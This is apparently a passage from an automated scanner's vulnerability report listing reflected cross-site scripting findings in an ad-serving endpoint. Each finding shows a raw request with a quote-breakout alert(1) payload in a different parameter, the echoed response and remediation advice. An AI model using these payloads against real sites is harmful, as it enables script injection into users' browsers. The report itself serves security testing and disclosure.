document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFo
...[SNIP]...

4.5. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a397'-alert(1)-'995d035cf44 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
pc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt49a397'-alert(1)-'995d035cf44&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.6. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35005"-alert(1)-"41c9df98c41 was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=35005"-alert(1)-"41c9df98c41http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "fal
...[SNIP]...

4.7. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [goto parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53295'-alert(1)-'b8913ad603b was submitted in the goto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603b HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=53295'-alert(1)-'b8913ad603bhttp://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.8. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d553"-alert(1)-"341ef100f1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6575

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&2d553"-alert(1)-"341ef100f1a=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "f
...[SNIP]...

4.9. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73647'-alert(1)-'11293dd737 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:20:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6571

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ngs.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=&73647'-alert(1)-'11293dd737=1http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.10. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1849'-alert(1)-'2cc4670e0ae was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectorye1849'-alert(1)-'2cc4670e0ae&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a
...[SNIP]...

4.11. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [opzn&page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the opzn&page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcfa4"-alert(1)-"cc117967b6a was submitted in the opzn&page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
54%3B4307-300/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectoryfcfa4"-alert(1)-"cc117967b6a&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=a
...[SNIP]...

4.12. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dce1f"-alert(1)-"06f671b37b9 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddledce1f"-alert(1)-"06f671b37b9&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt
...[SNIP]...

4.13. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 393c6'-alert(1)-'1d2aff2c6c1 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:18:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
/250%3B38884434/38902191/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt147582_246220%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle393c6'-alert(1)-'1d2aff2c6c1&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt
...[SNIP]...

4.14. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66d30'-alert(1)-'7905f129f26 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
e=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a66d30'-alert(1)-'7905f129f26&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.15. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [sn1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ca9"-alert(1)-"a08685d2013 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a42ca9"-alert(1)-"a08685d2013&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
